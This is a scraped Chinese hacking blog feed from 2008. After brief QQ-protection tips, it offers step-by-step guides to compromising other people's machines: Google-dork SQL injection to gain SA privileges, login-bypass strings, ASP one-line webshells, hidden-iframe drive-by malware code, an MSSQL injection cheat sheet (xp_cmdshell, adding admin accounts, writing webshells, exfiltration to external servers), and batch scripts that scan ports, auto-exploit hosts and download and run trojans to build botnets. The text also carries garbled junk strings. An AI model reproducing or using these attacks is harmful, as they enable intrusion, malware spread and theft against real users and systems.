这是目前最流行的盗号方式。黑客X档案官方站j0?'a G:Hs.Xr7U
①安装杀毒软件和_blank">防火墙,起用他们的实时监控功能,及时升级毒库。黑基的QQV2004也是一款不错的QQ保护软件。
(_J0}H U)Q0②不要随意浏览网友发来的网页。如果实在战胜不了你的好奇心,那你可以先将IE的[url=javascript:;]安全[/url]级别改为“高”,禁用IE中的ActiveX、活动脚本和文件下载,然后再去浏览。当然你要是很精通网页[url=javascript:;]编程[/url]的话,你也可以先用一些能直接读取网页源[url=javascript:;]代码[/url]的工具(电猫工作室就有一款不错的)读出源代码,分析代码后再决定是否浏览。
v/AX+Z3n1F6?"J}0③不要随意运行网友发来的文件。在资源管理器或我的[url=javascript:;]电脑[/url]中,将“文件夹”选项中的“查看”设置成不隐藏已知文件扩展名。对发来的文件进行病毒扫描,特别注意*.JPG.EXE的文件,十有八九都有问题。对于winrar的自解压文件不要去双击解压,点鼠标右键选择“用winrar打开...”。更高超一点的就是对.exe和.BMP的文件进行脱壳和用16进制编辑器来分析,我想这些就不是一般的菜鸟能及的了。
O$Bh3xk.b,~0④对于键盘记录工具,可以通过交换密码的输入顺序来迷惑它。如:123的密码,我可以先输2,然后用鼠标将光标移到2的左边输1,最后将光标移到2的右边输3,这样它就会误认为密码是213。记住一定要用鼠标移动光标哦。还有一个方法就是你打开记事本,将密码写上,然后用“复制”“粘贴”将密码粘贴到输入框,这样还可以方便的使用中文密码哦。
A3} }:M;GqE0⑤对于那些直接获取输入框中密码的木马,菜鸟能使用的的方法就是使用升级了最新毒库的杀毒软件,用_blank">防火墙阻止不明程序发送email,下网后查找C盘中可疑的*.log、*log.txt文件并删除。当然老鸟们可能会使用查杀木马的一般步骤,从[url=javascript:;]系统[/url]进程、启动、注册表、系统文件等方面进行彻底的查杀。熟悉ActiveX控件的,还可以做一个程序对向windows的Edit控件发送WM_GETTEXT或EM_GETLINE消息者的身份进行检查。
^s8`$m(b&Z:@XP| Z04、对注册QQ密码保护登记的Email破解
8Y`nN1r0①使用复杂的email密码。黑客X档案官方站+FL-c V~;eV
②QQ资料中的email不要与申请密码保护的email相同。黑客X档案官方站 p BZyM-P%d6AeI
5、对于QQ本身的漏洞黑客X档案官方站rUwD6h
这是目前成功率最高的攻击方式。
+R\)uW4dlZ5Ox0①临时的解决方法:将攻击者放入黑名单。
I0p2^ci,y Zk0②根本的解决方式:及时下载软件补丁。黑客X档案官方站|@e@"U
]]> xuliang 2008-2-4 19:47:00 <![CDATA[菜鸟+Sa+注入工具组合=肉鸡成群]]> http://xuliang.bokemx.com/200824194612.html 现在,注入漏洞异常火爆,不少黑友都利用该漏洞过了一把黑客瘾,并拥有了不少自己的肉鸡。不过对于小菜们来说,注入入侵也并不是那么一帆风顺,尤其是在注入点的寻找以及获得WebShell后的提升权限问题上。在这里,我给广大初学注入入侵的小菜们提供一种快速获取sa权限注入点入侵目标主机的办法。高手可以跳过本文,或者就当是复习吧。
获取注入点的方法不外乎两种:手工寻找和利用注入工具寻找。对于前者,多数是用搜索引擎来找特定的网址(形如xxx.asp?xxid=),对于后者,则是针对具体某个站点用注入工具扫描注入点。不过,你有没有考虑过把这两种方法结合起来使用呢?我就倾向于二者的组合使用,方法如下:
在阿D注入工具中的“扫描注入点”功能模块的地址栏里输入并转到google的网址,选择“高级搜索”,在搜索结果栏中选择“100项结果”,语言选择“简体中文”,关键字填:xxx inurl:asp或是inurl:XX.asp?id=、inurl:xxx.asp?xxid等,这些都是我们常见的可能存在注入点的网址形式,我输入的是ert inurl:asp(有人说这个关键字容易找到sa权限,不知是真是假,但我确实找到了不少)。点击搜索后,在注入点一栏中马上就会显示出N多的有注入点的网址。
在第一页中就显示找到了20几个(20%),从头开始试,检测一下,是不是sa权限,若不是可先跳过。因为本文讲的是sa权限,所以在这里我们只找有sa权限注入点的网站,以省去菜鸟们在注入时因一些权限问题而导致入侵卡住的情况。也许有人要问了,有那么多sa权限注入点的网站吗?根据我的个人经验,只要你的关键字设的好,每100项中就有20几个(约20%)有注入漏洞的网站,在这些网站中又有5个左右(约5%)是有sa权限的。试想想,只要我们的关键字设的好,google可以搜索到的结果何止是100项,一般的搜索结果都在1万项以上,这样算来,我们的目标就有成百上千呀(小菜高呼:哇!发财了!),就怕你没有那么多的精力去注入全部的网站,呵呵!我马上就找到了一个(运气好呀,可以去买票了,说不定是头奖呢?呵呵,又一个百万富翁!什么?现在百万富翁不算啥?要不,你给我一百万?!)。将这个网址复制到明小子的domain3.2中进行检测,也确实是sa权限,跟阿D注入工具显示的一样。
用domain的命令行功能查看一下开放的端口,发现开放了21、23、80、1433、3389等端口,看来我今天运气的确不错呀!加个账号admin$,但由于管理员已经远程登录3389。
看来我暂时不要登录的为好。再看看有没有其它可以利用的东西,用阿D注入工具的目录浏览功能看了一下(个人感觉这方面阿D注入工具要比domain好!明小子怒目圆睁,大叫:你收了阿D多少好处!)忽然眼睛一亮,发现D盘有一个wwwroot目录,并且里面有一个目录和网站名一样。
呵呵,好东西呀,向里面写入个asp木马试试,浏览文件也好方便一些。但接下来让我郁闷的是明明提示已经上传成功。
但在浏览器中输入它的地址却提示没有该文件,而且到了后来,domain的命令行功能反馈回来的信息也变得非常凌乱,不知道是怎么回事。于是想换个cmdshell,又想起它开了23端口,用telnet连接了一下,发现有ntlm认证。呵呵,老办法,在本地新建一个admin$账号,密码和目标主机上的一样,再用这个账号运行cmd.exe,telnet到目标主机——连接成功,用query user查看了一下终端情况,发现有一个会话处于断开状态,于是我便用3389连接了一下,却提示3389已经达到了最大连接数!我晕,看来有连接数限制,干脆把这个会话结束掉,反正它也断开了,浪费资源!呵呵,输入logoff 2(它的会话ID),然后用3389登录试试,登录成功。
]]> xuliang 2008-2-4 19:46:00 <![CDATA[学黑客必读:入侵的14种可利用方法]]> http://xuliang.bokemx.com/200824194518.html
学黑客必读:入侵的14种可利用方法
­
---------------------------------------------------------------------------------
1.上传漏洞[不多讲]
pS:如果看到:选择你要上传的文件[重新上传]或者出现“请登陆后使用”,80%就有漏洞了!
   有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.
­
2.注入漏洞[不多讲]
pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:
http://注入网址;updateadminsetpassword=’新MD5密码’wherepassword=’旧MD5密码’--    [admin为表名.]
­
3.旁注,也就是跨站.
我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了
­
­
4.暴库:把二级目录中间的/换成%5c
EY:http://www.ahttc.edu.cn/otherweb...s.asp?BigClassName=职责范围&BigClassType=1
如果你能看到:’E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa’不是一个有效的路径。确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。
这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.
­
5.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:
’or’’=’"or"a"="a  ’)or(’a’=’a  ")or("a"="a  or1=1--  ’or’a’=’a
6.社会工程学。这个我们都知道吧。就是猜解。
 EY:
   admin  waishi
7.写入ASP格式数据库。就是一句话木马[〈%executerequest("value")%〉],常用在留言本.
EY:[这个就是ASP格式的数据库],再写入一句话木马
­
8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.
EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
这个站用的是:杰出校友录,源码我下过了,
默认数据库/webshell路径:\database\liangu_data.mdb后台管理:adm_login.asp密码及用户名都是admin
  
9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:网站猎手挖掘鸡
EY:
10.查看目录法:人一些网站可以断开目录,可以方问目录。
EY:
­
这样我们可以找到数据库,下载不用我教吧
11.工具溢出:.asp?NewsID=  /2j.asp?id=18  .asp?id=[这种方法可以取得大量的WEBSHELL]
      
12.搜索引擎利用:
­
(1).inurl:flasher_list.asp  默认数据库:database/flash.mdb  后台/manager/
(2).找网站的管理后台地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理  〈关键字很多,自已找〉
site:xxxx.cominurl:login
(3).查找access的数据库,mssql、mysql的连接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
我主不做了。。自已做做吧。。
13.COOKIE诈骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。这个我就不多讲了
­
14.利用常见的漏洞:如动网BBS
EY:
可以先用:dvbbs权限提升工具,使自已成为前台管理员。
THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包
这个我就不做了,网上教程多的是,自已下个看看。
工具:dvbbs权限提升工具  动网固顶贴工具
15.还有一些老漏洞。如IIS3,4的查看源码,5的DELETE
CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。
]]> xuliang 2008-2-4 19:45:00 <![CDATA[进入后台怎么拿WEBSHELL]]> http://xuliang.bokemx.com/200824194155.html 去备份数据库,数据库的名称一定要是什么什么.asp后缀.之后得到一个备份好的绝对网址,假如网站网址是www.xxx.com/main/manage/login.asp
备份后的数据库是D:\aaa\bbb\ccc\main\什么什么.asp
那么就可以用www.xxx.com/main/什么什么.asp访问它的数据库,找到首页,修改下代码,

你可以用如下代码进行挂马.

<html>
<iframe src="http://www.bokemx.com/metalred821227/网马地址" width="0" height="0" frameborder="0"></iframe>
</html>

或者

<SCRIPT language=javascript>
window.open("网马地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>

或者

写一个JS文件

JS文件:

document.write("<iframe width='0' height='0' src='http://www.bokemx.com/metalred821227/网马地址></iframe>");

再在首页调用JS文件:
<script language="javascript" src="http://www.bokemx.com/metalred821227/http://xxxxxxx.net/文件名.js"></script>]]> xuliang 2008-2-4 19:41:00 <![CDATA[注入命令]]> http://xuliang.bokemx.com/200823223837.html 我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢!
­
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
­
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
­
­
数字类型
and char(124)%2Buser%2Bchar(124)=0
­
字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
­
搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
­
爆用户名
and user>0
' and user>0 and ''='
­
检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
­
检测是不是MSSQL数据库
and exists (select * from sysobjects);--
­
检测是否支持多行
;declare @d int;--
­
恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
­
­
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
­
//-----------------------
//      执行命令
//-----------------------
首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
­
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
­
执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
­
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
­
判断xp_cmdshell扩展存储过程是否存在:
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
­
写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
­
REG_SZ
­
读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
­
读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1
­
­
数据库备份
backup database pubs to disk = 'c:\123.bak'
­
//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
­
­
­
更改sa口令方法:用sql综合利用工具连接后,执行命令:
exec sp_password NULL,'新密码','sa'
­
添加和删除一个SA权限的用户test:
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
­
删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
­
添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public
­
­
停掉或激活某个服务。
­
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
­
dbo.xp_subdirs
­
只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
­
dbo.xp_makecab
­
将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
­
dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
­
xp_terminate_process
­
停掉某个执行中的程序,但赋予的参数是 Process ID。
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
­
xp_terminate_process 2484
­
xp_unpackcab
­
解开压缩档。
­
xp_unpackcab 'c:\test.cab','c:\temp',1
­
­
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
­
create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
­
//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
­
­
//在Master中创建表,看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
­
用 sp_makewebtask直接在web目录里写入一句话马:
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
­
//更新表内容
Update films SET kind = 'Dramatic' Where id = 123
­
//删除内容
delete from table_name where Stockid = 3
]]> xuliang 2008-2-3 22:38:00 <![CDATA[各端口抓鸡方法]]> http://xuliang.bokemx.com/200823223115.html 3389端口抓肉鸡(适合新手)(抓不了国外肉鸡)
现在国内网络上流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是开着3389的,我们就可以利用这一点来抓肉鸡。首先用端口扫描工具(如S扫)扫一段IP的3389端口,扫完后就直接用远程桌面连接开放3389的机器(也可以把结果保存为文本文件,用批量生成3389连接的工具来连接),然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~这种方法只针XP系统,如果遇到2000或者2003系统就不要试了呵呵。缺点也很明显,如果别人不是用new账号登入XP的,你再登入上去就会把他挤出去(XP只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开IE下载木马了。

2、扫135端口抓肉鸡
首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。(详细动画可以去黑客网站搜索135)

3、扫445端口抓肉鸡
和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。(详细动画可以去黑客网站搜索445)

4、1433端口批量溢出抓肉鸡
这个方法可以实现全自动抓鸡,不过现在太多人搞,成功率已经不高了。
要用到的工具:S扫 sqlhello.exe nc.exe 批处理文件
首先先写个批处理,打开记事本,把以下代码复制修改后,储存为扫描+溢出.bat文件
@echo off
for /f "eol=; tokens=1,2 delims= " %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save
@echo off
for /f "eol=; tokens=1 delims= " %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556
还要新建一个tt.txt,里面你要扫的IP段,格式为XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格
1433是要扫描的端口,1000是扫描线程数 ,do sqlhello %%i 1433 xxx.xxx.xx.xx 556 这个里的XXX添你的IP,556是后面NC监听的端口
然后再写个批处理
@echo off
Nc -l -vv -p 556>daima.txt
echo username>>daima.txt
echo password>>daima.txt
echo bin>>daima.txt(以2进制传输数据)
echo get xxx.exe(你的木马的文件名,要放在根目录下)>>daima.txt
echo bye>>daima.txt
net stop sharedaccess(关闭WINDOWS自带防火墙)
ftp -s:daima.txt
xxx.exe(也是填你木马的文件名)
del daima.txt
注意上面的代码回车符别删掉,要不然就没法下你的马了。
更多的代码去http://publish.it168.com/2005/0731/20050731019501.shtml这里看
上面的步骤都搞好后,就可以开始扫肉鸡了。
先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以去睡大觉了。自动扫描,扫描完后自动溢出,溢出后还自动下马执行,爽吧!所以这里讲详细点,呵呵。还有42 21端口也可以这样溢出,只要用这些端口的溢出工具就好了,详细动画可以去黑客网站搜索1433。
忘了说,上面的工具和批处理什么的都要放在同一个文件夹下。

先休息一下,打这么多字累死了

继续

5、扫1433抓肉鸡之方法2
要用到的工具:端口扫描器 X-scan SQL综合利用工具
上面我们说过了,1433溢出现在成功率已经不高了,所以我们可以用另一种方法。
开了1433端口的机器一般都装了SQL,所以我们可以猜测SQL弱口令来抓1433肉鸡。
首先先用端口扫描器扫一段IP的1433端口,然后结果保存为文本文件,接着用X-scan导入这些开了1433的IP,然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了,其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏,只填1433端口。然后就可以开始扫描了。扫描完成后会有个报告,列出了有弱口令的机器,然后打开SQL综合利用工具,输入你扫到的弱口令来连接,接着打开SQL综合利用工具-利用目录,上传你的木马,然后在用DOS命令执行你的木马就OK了。

6、用WINNTAutoAttack扫SA弱口令抓肉鸡
其实这个原理和上面一样,效率也没上面的高,只是想让大家知道下,呵呵。
工具:WINNTAutoAttack SQL综合利用工具
打开WINNTAutoAttack,找一段IP添上,然后只勾上设置下的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA账号,接着开始扫描,扫完后,用 SQL综合利用工具连上传马执行就好了。

7、扫4899空口令抓肉鸡
工具:端口扫描器 4899探测器 Radmin
首先先用端口扫描器扫一段IP的4899端口,然后用4899探测器导入开了4899端口的IP,接着扫空令,最后用Radmin连接有空口令的机器,带开文件管理,上传的你木马运行就OK了。详细动画可以去黑客网站搜索4899

8、扫5900端口抓VNC肉鸡
工具:VNC扫描器 VNC连接器
首先用VNC扫描器扫描一段IP,扫描格式为vscan.exe(扫描器文件名) -i 219.0.0.0-219.255.255.255(扫描IP段) -p 5900 -vnc -vv
扫描完成后会在扫描器所在的同一文件夹生成一个文本文件,打开后有一列IP,IP后面的有一些单词比如patched,banned,vulnerable,只有单词为vulnerable才能连接。接着就用VNC连接器连接,下面就不用多说了吧? 详细动画可以去黑客网站搜索VNC

接下来说说挂马抓肉鸡吧。方法有很多,比如BT挂马、免费空间挂马、迅雷挂马等等,有些我也还不会,呵呵。下面就介绍几种我会的。

1、BT挂马
顾名思义,就是把你的木马发布到BT网站让人下载。当然如果只把单纯的木马文件发布上去效果肯定不好,而且现在一般的BT网站也不让发布EXE文件。所以我们需要一些隐藏的手法。我们可以先把木马用捆绑器和一些电影、音乐、游戏捆绑在一起,再压缩成RAR文件发布,谁在开始下载时会知道RAR里有木马呢?当他费了好大劲下载完,打开发现是EXE的格式后,总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧?尤其是下XXX片的时候 当然你也可以做个网页木马,然后把你网页木马的地址插入到你发布的文件中(不是所有文件都可以这样的,我只知道RM和EXE文件可以插入),别人下载打开后同时也会带开你的网页木马,如果他的系统没有补供你网页木马所利用的漏洞的话,那他就会中你的马了。有些朋友可能会想,我把木马和其他文件捆绑后格式保持为那个文件(比如RM捆绑木马后保持RM格式),那样别人不就不会怀疑了吗?呵呵,如果真有这样的好事那我上面何不说把木马和BT种子文件绑在一起发布,那样你肉鸡不抓疯了才怪~~所以在这里说一下,木马和其他文件捆绑后生成的文件只能为EXE格式的,除非你有你所捆绑文件的格式的溢出漏洞,那样才能把生成后的文件格式保持为你所捆绑文件的格式。不过这样的漏洞现在很少,大多都被补了,就算有别人也不一定会公开,为什么想想就知道了吧。在这里就说一个最近的RAR溢出漏洞,针对winrar3.6版本以下的所有版本,只要你winrar版本低于3.6,运行绑了牧马的RAR文件后就会中马。此类木马症状为:运行RAR文件后会弹出一个什么什么损坏还是错误的对话框,然后RAR文件体积变小,减少的体积就为木马的体积。然后再次打开这个RAR文件一切正常,不会弹出错误对话框。在这里提醒下各位赶快更新下WINRAR版本,小心中马哈。 :lol

2、免费空间挂马
其实和BT差不多,就是把做好的木马上传到你申请的免费空间,然后到论坛发些诱惑性的帖子让别人下载你的木马。优点是不用像BT那样做种子,那样不仅要开着电脑,还影响网速。我这几天就是这样挂的,弄个免费空间,上传个木马,到2个XXX论坛发个帖子,每天睡前一顶,才挂了几天,现在每天肉鸡都保持在40-60只。而且大部分都是美国的,很容易吧? :lol :lol

3、用RM在论坛挂马
首先你弄个只有几秒钟的RM文件,然后插入你的网页木马,接着上传到你的空间,然后到一些支持插入RM连接的论坛发帖子,点插入real media 播放器,输入你的RM牧马地址,然后高度宽度都设为1(这部是为了保证隐蔽性:lol ),然后点发贴,这样别人在浏览你的帖子就会运行你的RM木马,而我们前面把高和宽设为1,在帖子里RM连接就看不到了。这样别人就不知不觉中了我们的马了:lol 好像FLASH木马也可以这样的,我没试过,大家可以去研究下]]> xuliang 2008-2-3 22:31:00